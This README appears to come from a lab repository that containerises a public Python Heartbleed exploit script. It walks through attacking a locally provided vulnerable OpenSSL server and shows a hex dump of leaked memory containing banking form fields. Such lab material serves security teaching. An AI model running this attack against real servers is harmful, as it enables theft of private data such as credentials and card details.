# Heartbleed attack
Simple python script that will exploit the buffer overread in OpenSSL, this was found on github and was linked back to
https://pastebin.com/raw/qW9dDzvX. All credit goes to author of code. Python docker file was based on the offical docker
example.
## Build

Build with
```
./build.sh
```
or
```
docker build -t <container name> .
```

## Run

Run with
```
./run.sh {ip address}
```

For filtered output I.E don't display lines with no data, does not work on windows
```
./run_filtered.sh {ip address}
```
## Preforming an attack
This section will explain in detail how to prefom the Heartbleed attack on the provided vulnrable server.

We will first begin by building the provided server container please view the readMe contained inside the server directory for instructions on how to build it. once this server has been built and running, please enter some transactions into the webpage that will be located at https://localhost:443 this is to put some data into the memory of the server such that we can try and exploit it later.

Once the docker container is up and running, We need to get the ip of the server and the container itself this is printed to the command line of the server. This can also be done through inspecting the container using the following commands.
```
docker ps
docker inspect <container id obtained from above>
```
Now that we have the IP address of the target we need to see if that target is vunrable this can be achieved using the tool provided in this repo in the detection directory for a guide on how to build that container please view the readMe located there. Once that container is built. We can use the following
```
./run.sh <ip address gained from above>
```
or
```
docker run heartbleed-detector <ip gained from above>
```
This can also be achived using the tool nmap and scanning port 443 as this is openssl's default port.

Once it has been identified that that a server or ip has a vulnrable version of openssl running on it we are able to perform a heartbleed attack.

It should be noted that there is a metasploit auxilary/scanner that can preform the heartbleed exploit but for the sake of this implementation the python script that can be found above should be used.

Build the container containing the heartbleed attack script by following the instructions located above
Once the container is built it can be executed using the script above or
```
docker run -p 443 <container name> <ip address>
```
Each time this is run its not garentted to produce usable infomation right of the bat it may have to be run 2-3 times before sensitive infomation is exposed an example of what exposed data would look like can be seen below.
```
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 791
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 6E 73 65 63  ....#.......nsec
  00e0: 75 72 65 2D 52 65 71 75 65 73 74 73 3A 20 31 0D  ure-Requests: 1.
  00f0: 0A 4F 72 69 67 69 6E 3A 20 68 74 74 70 73 3A 2F  .Origin: https:/
  0100: 2F 6C 6F 63 61 6C 68 6F 73 74 0D 0A 43 6F 6E 74  /localhost..Cont
  0110: 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63  ent-Type: applic
  0120: 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F 72 6D  ation/x-www-form
  0130: 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 55 73 65  -urlencoded..Use
  0140: 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61  r-Agent: Mozilla
  0150: 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54  /5.0 (Windows NT
  0160: 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B 20 78 36   10.0; Win64; x6
  0170: 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74 2F 35  4) AppleWebKit/5
  0180: 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 6C 69  37.36 (KHTML, li
  0190: 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D 65  ke Gecko) Chrome
  01a0: 2F 39 32 2E 30 2E 34 35 31 35 2E 31 35 39 20 53  /92.0.4515.159 S
  01b0: 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 0A 41 63  afari/537.36..Ac
  01c0: 63 65 70 74 3A 20 74 65 78 74 2F 68 74 6D 6C 2C  cept: text/html,
  01d0: 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 68 74 6D  application/xhtm
  01e0: 6C 2B 78 6D 6C 2C 61 70 70 6C 69 63 61 74 69 6F  l+xml,applicatio
  01f0: 6E 2F 78 6D 6C 3B 71 3D 30 2E 39 2C 69 6D 61 67  n/xml;q=0.9,imag
  0200: 65 2F 61 76 69 66 2C 69 6D 61 67 65 2F 77 65 62  e/avif,image/web
  0210: 70 2C 69 6D 61 67 65 2F 61 70 6E 67 2C 2A 2F 2A  p,image/apng,*/*
  0220: 3B 71 3D 30 2E 38 2C 61 70 70 6C 69 63 61 74 69  ;q=0.8,applicati
  0230: 6F 6E 2F 73 69 67 6E 65 64 2D 65 78 63 68 61 6E  on/signed-exchan
  0240: 67 65 3B 76 3D 62 33 3B 71 3D 30 2E 39 0D 0A 53  ge;v=b3;q=0.9..S
  0250: 65 63 2D 46 65 74 63 68 2D 53 69 74 65 3A 20 73  ec-Fetch-Site: s
  0260: 61 6D 65 2D 6F 72 69 67 69 6E 0D 0A 53 65 63 2D  ame-origin..Sec-
  0270: 46 65 74 63 68 2D 4D 6F 64 65 3A 20 6E 61 76 69  Fetch-Mode: navi
  0280: 67 61 74 65 0D 0A 53 65 63 2D 46 65 74 63 68 2D  gate..Sec-Fetch-
  0290: 55 73 65 72 3A 20 3F 31 0D 0A 53 65 63 2D 46 65  User: ?1..Sec-Fe
  02a0: 74 63 68 2D 44 65 73 74 3A 20 64 6F 63 75 6D 65  tch-Dest: docume
  02b0: 6E 74 0D 0A 52 65 66 65 72 65 72 3A 20 68 74 74  nt..Referer: htt
  02c0: 70 73 3A 2F 2F 6C 6F 63 61 6C 68 6F 73 74 2F 0D  ps://localhost/.
  02d0: 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67  .Accept-Encoding
  02e0: 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 2C  : gzip, deflate,
  02f0: 20 62 72 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67   br..Accept-Lang
  0300: 75 61 67 65 3A 20 65 6E 2D 55 53 2C 65 6E 3B 71  uage: en-US,en;q
  0310: 3D 30 2E 39 0D 0A 0D 0A 66 72 6F 6D 41 63 63 6F  =0.9....fromAcco
  0320: 75 6E 74 3D 31 32 33 26 74 6F 41 63 63 6F 75 6E  unt=123&toAccoun
  0330: 74 3D 31 32 33 26 74 72 61 6E 73 61 63 74 69 6F  t=123&transactio
  0340: 6E 41 6D 6F 75 6E 74 3D 31 32 33 26 63 72 65 64  nAmount=123&cred
  0350: 69 74 43 61 72 64 4E 75 6D 62 65 72 3D 31 32 33  itCardNumber=123
  0360: 26 65 78 70 69 72 79 44 61 74 65 3D 31 32 33 26  &expiryDate=123&
  0370: 62 73 62 3D 68 65 6C 6C 6F EC 9B 7D 6E 20 C4 BD  bsb=hello..}n ..
  0380: 0A 2D 89 49 19 DD 11 F8 57 00 00 00 00 00 00 00  .-.I....W.......
  0390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  03a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  03b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

WARNING: server returned more data than it should - server is vulnerable!

The output that was empty has been omitted here
```
The main things to note from the above output is we can see the data base query clearly showing the users private banking details that can be stolen.

Congratulations you have now preformed your very own heartbleed attack on a vunrable openssl server.
